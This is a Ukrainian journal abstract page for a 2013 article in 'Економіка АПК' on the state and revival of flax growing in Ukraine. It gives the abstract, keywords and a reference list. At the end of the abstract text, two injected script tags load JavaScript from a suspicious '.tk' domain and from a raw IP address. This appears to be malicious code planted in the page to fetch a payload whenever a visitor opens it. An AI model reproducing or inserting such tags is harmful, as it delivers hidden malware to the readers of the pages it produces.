ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.31:633.5.9:633.521
Економіка агропромислового виробництва

Шляхи розвитку льонарства в Україні / Примаков О. А., Маринченко І. О., Козорізенко М. П. // Економіка АПК. - 2013. - № 11 - С. 32

Проаналізовано сучасний стан галузі льонарства України. Зосереджено увагу на історичних аспектах розвитку галузі та на основних причинах занепаду льонарства. Проаналізовано економічну ефективність вирощування льону-довгунця на прикладі господарської діяльності Дослідної станції луб’яних культур. Підкреслено, що економічно доцільно проводити не тільки безпосереднє культивування культури льону, а й здійснювати глибоку переробку одержаної продукції. Розкрито основні причини кризового стану лляної промисловості та намічено шляхи щодо виходу галузі із кризи. Окреслено основні напрями інвестиційної політики відносно галузі льонарства, зазначено необхідність комплексного підходу до розв’язання її проблем. Відображено наукову роботу Дослідної станції луб’яних культур по відродженню льонарства в Україні. Рис.: 1. Бібліогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: льонарство, розвиток, економічна ефективність, урожайність, інноваційна діяльність, інвестиції

Список використаних джерел

  1. Голуб И.А. Научно-практические рекомендации по возделыванию, уборке льна и приготовлению тресты / И.А. Голуб, Ф.И. Привалов, Г.Н. Шанбанович. – Могилев: УПКП «МОУТИСС», 2010. – 135 с.
  2. Дудукова С.В. Льон-довгунець: потенційні можливості та сфера застосування / С.В. Дудукова, І.В. Овсянко, Ю.В. Мохер // Нові наукові дослідження у льонарстві та коноплярстві України: матер. наук. – техніч. конф. молодих вчених, 23 листоп. 2005 р.: зб. наук. пр. – Суми: ВВП «Мрія-1» ТОВ., 2006. – С. 105 – 115.
  3. Карпець І.П. Інтенсивна технологія вирощування льону-довгунця / І.П. Карпець. – К.: Урожай, 1990. – 112 с.
  4. Кругла Н.А. Історія розвитку льонарства в Україні / Н.А. Кругла, В.А. Вергунов. – Херсон: Адамс, 2002. – 168 с.
  5. Ліпський Ю.В. Підвищення економічної ефективності виробництва льону-довгунця в Україні / Ю.В. Ліпський // Економіка АПК. – 2006. – №4. – С. 37 – 42.
  6. Локоть О.Ю. Агробіологічні та біоенергетичні аспекти оптимізації технологій вирощування льону-довгунця : [моногр.] / О.Ю. Локоть. – Ніжин : ТОВ “Ви-во “Аспект-Поліграф”, 2009. – 308 с.
  7. Agriculture in Lithuania, 2006. – Vilnius, 2007. – 90 p.
  8. Baya Ana M. Ramos – Cormenzana A. Vitamin production in relation to phosphate solibilization by soil bacteria / Ana M. Baya, Robert S. Boethling // Soil Biol. and Biochem. – 1981. – 13, № 6. – P. 527 – 531.
  9. Paul V.H. Strategies for control of diseases on linseed and fibre flex in Germany, France and England / V.H. Paul, C. Sultana, B. Jouan, B.D.L. Fitt // Production and Protection of Linseed. – Cambridge, 1991. – P. 65 – 69.
  10. Zukoviciene R. The means for the increasing of flax economy. - Vilnius, 2001. – 34 p.
Читати статтю: 13_11_32-37.pdf